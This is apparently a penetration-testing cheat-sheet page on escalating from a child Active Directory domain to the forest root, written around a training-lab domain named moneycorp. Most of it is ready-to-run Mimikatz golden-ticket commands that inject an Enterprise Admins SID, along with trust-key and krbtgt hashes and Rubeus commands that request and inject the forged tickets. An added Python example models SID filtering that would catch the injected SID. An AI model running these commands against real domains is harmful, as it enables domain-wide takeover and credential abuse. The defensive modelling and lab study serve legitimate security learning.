Escalating from child to parent domain
Domains in the same forest have an implicit two-way transitive trust with each other, and a trust key is shared between a parent domain and each child domain.
There are two ways of escalating privileges between two domains of the same forest:
Krbtgt hash
Trust tickets
Method 1: Trust ticket
Escalating from a child domain to the forest root using trust tickets requires the trust key. (Look for the [In] trust key from the child to the parent in the trust dump.)
Forging trust ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:b543d42b31a43e9eab1466fe5ae8e0e3 /service:krbtgt /target:moneycorp.local"'
Invoke-Rubeus -Command "asktgs /ticket:trust.kirbi /service:CIFS/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /outfile:mcorpEA.kirbi"
Invoke-Rubeus -Command "ptt /ticket:mcorpEA.kirbi"
Method 2: Krbtgt hash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"'
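Both methods depend on the same thing: a ticket issued under the child domain's name that carries an extra SID from the parent domain (the /sids value ending in -519, Enterprise Admins). The following added example, not from the original page, models the SID-filtering check a trust boundary can apply to such a ticket; the filtering rule is a simplified assumption, the domain SIDs come from the commands above, and the ticket SID list is constructed.

```python
"""Simplified model of SID filtering at a parent-domain trust boundary (added example).

Rule (simplified assumption): only SIDs issued by the trusted child domain pass;
every other SID is dropped, and dropped SIDs naming privileged groups of the
trusting parent domain are reported.
"""
import re

# Subset of well-known RIDs that map to privileged groups.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}

_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def split_sid(sid):
    """Split a domain SID into (domain_prefix, rid); reject non-domain SIDs."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain account/group SID: {sid}")
    return m.group(1), int(m.group(2))


def filter_sids(trusted_domain_sid, ticket_sids):
    """Keep SIDs whose domain prefix is the trusted domain; drop the rest."""
    allowed, dropped = [], []
    for sid in ticket_sids:
        domain, _rid = split_sid(sid)
        (allowed if domain == trusted_domain_sid else dropped).append(sid)
    return allowed, dropped


def privileged_injections(trusting_domain_sid, dropped_sids):
    """Name dropped SIDs that claim privileged group membership in the trusting domain."""
    hits = []
    for sid in dropped_sids:
        domain, rid = split_sid(sid)
        if domain == trusting_domain_sid and rid in PRIVILEGED_RIDS:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


# Constructed sample: the child and parent domain SIDs from the commands above,
# plus the SID list a ticket of the kind shown would carry.
CHILD_DOMAIN_SID = "S-1-5-21-1874506631-3219952063-538504511"
PARENT_DOMAIN_SID = "S-1-5-21-280534878-1496970234-700767426"
SAMPLE_TICKET_SIDS = [
    CHILD_DOMAIN_SID + "-500",   # Administrator in the child domain
    CHILD_DOMAIN_SID + "-513",   # Domain Users in the child domain
    PARENT_DOMAIN_SID + "-519",  # Enterprise Admins SID from the parent domain
]
```

Running filter_sids and privileged_injections over SAMPLE_TICKET_SIDS drops only the parent-domain -519 SID and reports it as an Enterprise Admins injection; the child domain's own SIDs pass untouched.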
Remote code execution on forest root domain controller